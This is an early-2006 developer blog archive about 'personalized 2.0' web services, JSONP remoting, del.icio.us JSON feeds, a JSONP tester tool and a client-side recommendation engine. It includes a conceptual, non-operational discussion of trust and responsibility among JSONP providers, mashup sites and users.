Wednesday, February 22, 2006

Why del.icio.us recommendation engine is not personalized 2.0 ?

First, you have to tell your del.icio.us ID to your visiting site. In principle, it's not necessary. Because what we need is your recent tagging information, not your id. Unfortunately, to get your bookmark information, the site owner have to know your del.icio.us id. This is derived from del.icio.us's feed interface. But, in general, forcing to tell someone's unique id is not preferable from the aspect of privacy.

Second, this module doesn't consider the case where identity information is originally access controlled. Del.icio.us bookmarks are apparently identity information, but it's not restricted, always published for general public. In order to deal with every identity-aware web services, we have to consider the case where services are access controlled.

These are not only the issues in personalized 2.0 services. If I have a time I can pick up many other issues to be solved.

Del.icio.us Recommendation Engine

While researching recent del.icio.us's native support of JSONP, an interesting idea hit me and fired up my imagination. Devoting recent days to this development, and finally I created an attractive script moudule. "Del.icio.us Recommendation Engine", I call it.

"Del.icio.us Recommendation Engine" is a recommendation link list generator extracted from site owner's bookmarks archived in del.icio.us. If you tell your del.icio.us ID to the site, you can get the site owner's bookmarks as a recommendation. While creating your recommendation list, your recent del.icio.us posts and associated tags automatically used as your preference information.

It is cool because we don't need any server infrastructure for generating recommendation list. Entire generation process is done in client side Javascript. JSON (or JSONP) and On-Demand JavaScript techniques are used to get del.icio.us posts.

Seeing is believing. Please look and see it.

I think it is a kind of interesting module, but I don't think it is the final achivement of my personalized 2.0 project. Yes, this module does some kind of personalization for the visitors, but techniques used in this module cannot be used in many cases. I think there're many issues to be solved there in order to be a generic personalized web 2.0 service solution.

Anyway, I created some "personalized 2.0 like " service module. It's totally fun. Enjoy yourself.

Thursday, February 16, 2006

Del.icio.us is Now Doing JSONP, or Callback Support

I don't know when del.icio.us began the JSON service, but the JSON interface for their bookmark information was only kind of static one. Through static 'Delicious' javascript object we can get posts. So it is not apparently supporting parallel queries (will destroy each other's results), and does not consider name confliction.

But while doing test of JSON with Padding Tester (JSONP Tester), I found that they are implementing callback function parameter like Yahoo.

Check out this.

http://del.icio.us/feeds/json/stomita?callback=JsonUtil.responseCallbacks%5B0%5D


It is not mentioned official web help page and couldn't find any articles about this new feature. I'm not sure when they implemented it (maybe old).

Anyway I included del.icio.us call in JSONP Tester page.


Technorati tags: , , , ,

JSONP Service and Security

Before talking about shared services, I have to clarify what issues (or concerns) are now discussed about JSONP services (maybe not so discussed, because there're less services than usual REST XML or SOAP Web Services). Especially, I'm going to focus security concerns. Because XMLHttpRequest itself doesn't allow the request other than the original html source site (same-origin policy), there might be same or similar concerns in JSONP service.

Let's consider Site Y is a JSONP service site (like Yahoo), and Site M is your JSONP mashup site, and User u is a visitor to Site M. Site O is a simple web service provider nothing related to these services, but might be an atacker's target.

(Note that these are only my guesses)


If M is malicious, can M steal the identity information of u in Y ?



M cannot steal it without cooperation of Y. If Y have a unrestricted JSONP interface to access u's identity information, M can. If there's no consent of u, Y should be responsible for unintended usage of u's identity information.


If Y is malicious, can Y effect bad thing (information theft, session hijack) to M ?



Absolutely Y can. The loaded JSONP service does not always have to provide JSON object, it's nothing other than JavaScript and the code format itself is all under the control of Y. Loaded code is automatically executed without any validation (this is a key point of JSONP) and the excecution priviledge become that of Site M. So M have to do trust Y as long as M is using Y's service.


If Y become suddenly malicious, and the loaded code effected bad to M, who is responsible ?



Of course Y is responsible basically. If the information theft is u's identity information in M, M also should be responsible (about unintended usage of u's identity information).


If Y is malicious, Can Y attack O ?



Yes, for example, requesting huge amout of requests to O. And - similar to DDoS - the attacking context become that of User u. But it's not so special case in JSONP service because any malicious site can do that. The main concern here is trust. If User u trusted Site M, and not knowing M is using Y's service (and u might be not trusting Y), M was responsible for prior explanation about using Y's services, because, if notified, u might not have used the M's service. And M should also be responsible for Site O


Can Y steal the identity information of u in Site O ?



Basically no. If there were vulnerabilities in O it might be yes. If u accepted the usage of cross domain XMLHttpRequest in some way (browser setting?), it might also be yes, but it's under u's responsibility.


Can Y affect the transaction between u and O ?



Basically no. If there were vulnerabilities in O it might be yes. CSRF might be one of them. O should be responsible with its own vulnerability.

Technorati tags: , , ,

Saturday, February 11, 2006

JSON with Padding Tester

Against my previous post, this post doesn't go further about my project detail. Instead I'd like to show something created for my own project so far.

As I posted before, On-Demand Javascript and JSON combination is really nice, and a protocol called JSONP (JSON with Padding) is a good implementation (Yahoo is now doing similar way!). However, while XMLHttpRequest can be tested and monitored by some tools (like FireBug) ), jsonp seems cannot.

So I created a tiny testing tool to cover this. By JSON with Padding Test , you can test your jsonp service by putting and submitting your service url. Default input value is prefixed to the Yahoo Search Web Service url (with search keyword of 'google'), and jsonp url parameter is changed to 'callback' - could be changed by putting other preferred parameter name - so you can check easily what type of tool it is.

Technorati tags: , ,

Thursday, February 09, 2006

Remoting Technique in Personalized 2.0 Services

While I am wanting to connect to all services around the world, remoting from web browser is really needed. XMLHttpRequest, which is said to be a key element of Ajax, enables the browser to retrieve data asynchronously from server-side services. Due to this function, we can assume a web browser like a web service client. But by following reasons I don't like so much to use this.

The most disappointing thing about XMLHttpRequest is - it cannot reach services provided from other domains. This restriction might be come from some security or privacy concern. To avoid this restriction, a technique is often used, Cross Domain Proxy. However, the necessity of the server to be located in the same domain and proxy browser's all request prevents from scaling.

By the way, XMLHttpRequest is not the only one to get asynchronous data. There is another way for browser to retrieve service information dynamically - it is called On-demand Javascript and JSON combination.

JSON is a data format and can be directly parsed by Javascript engine. This is done by calling eval() function of Javascript. For some security reason eval function is not so recommended for the remotely retrieved data, but if the remote service itself is trusted eval() function is very useful.

However, in On-demand Javascript pattern, we don't use eval() function. There are several way to evaluate JSON data - del.icio.us JSON feed is one of the way to include remotely provided JSON object. The most useful way to do this is , I think, the idea called jsonp - (JSON padding). This is something like a protocol between JavaScript client and JSON server - giving callback function name inside of url parameter, and returning the Javascript callback function and JSON data as a function's argument. This idea is also seen in Yahoo Web Services with JSON output, and it works well.

One really good thing of On-demand Javascript and JSON, compared with XMLHttpRequest and Cross Domain Proxy, is that they don't have the complexity in authenticating user. Almost all web applications now maintain user's session by cookies, and they are automatically sent while requesting url. Because On-demand Javascript loading request is totally same as usual browser request, a JSON server can specify the requesting user by the cookies previously given.

On the other hand, Cross Domain Proxy can request remote resources, but the actual requester is local server, not browser, so no cookies available. Because authentication is always needed to access control or personalize service information, the local server has to keep the end user's credential for the remote service.

For these reasons, I adopt On-demand Javascript and JSON call for remoting technique. It can be regareded as one of the user centric approach. Anyway my true interest is to share personalized or individual data (that is, identity-aware data) from anywhere in the world. Next post is going to be about that.


Technorati tags: , , , ,

Wednesday, February 08, 2006

Blogging about "Personalized 2.0", now started

Influenced by the recent attractive movement, aka "web 2.0", I decided to start my project of new cutting-edge software development and blogging about it.

Although my native tongue is not English - I'm pure Japanese and living in Japan - it is worth for me to write this blog in English, because there seems to be enormous numbers of folks who interested in recent web movements, and my idea may attract them - at least I hope so.

Actually I'm now working at an enterprise software company, where I involved some web application software design - especially application security, identity management, or role-based access control. Recently in enterprise environment almost all companies are using Java or J2EE (except for MS), but most web developers seem to be using other script languages, like PHP, Ruby, or Perl. I'm not so familiar with these server-side scripting languages, but this is not so impact to my developing. All things required for developing web 2.0 software service is so common and standard based technologies - HTML, DOM, XML, or JavaScript.

As my blog title shows, my initial purpose of starting this blog and development project is to bring "personalized" feature in web 2.0 services. So far we have seen so many web 2.0 services, but almost all of them were public services, and not targeted to personal. Of course, they often have user accounts, and they can maintain their data by these end users' contribution, but the retrieved information from these services always become public one, that is, not access controlled.

Some might say this users' contribution for public information is the main web 2.0 feature and therefore it is worth, but I think it is limitting the opportunity of web 2.0. Imagine a mashup service which combine your address book records with google map. Such service is attractive and seems to be possible, but it requires the mashup site to correct and keep your address book information. This implies that services dealing personal data, like address book or schedule information, cannot be easily delivered like amazon book search service, yahoo web search service, or google maps - which is the representative of mashup ingredient.

Like flickr or evdb(eventful), there are services which have web API to access their personal data. But all succeeded mashup service using flickr is using public service API, not personalized. If some service providers would want to do a personalized flickr mashup, there are security and privacy concerns in giving credentials for them. Absolutely I don't want to give my flickr password to some unknown fishy sites, even if they are saying that they provide a great mashup service using flickr. I think it is one of the reasons which is preventing identity-aware web 2.0 services to spread.

Another considerable reason is that they only have XML web services API. To make XML call it needs some server infrastructure. All requests are processed or proxied by server, therefore service doesn't scale if given resource is poor. Compare with the mashup with google maps - no necessity to setup cgi, static web site is enough!

With these points in mind, I've started a project - "personalized 2.0", I'm calling. In this project, I will choose user centric approach, which may resemble with an approach called "identity 2.0". Later posts will explain more detail.

Technorati tags: ,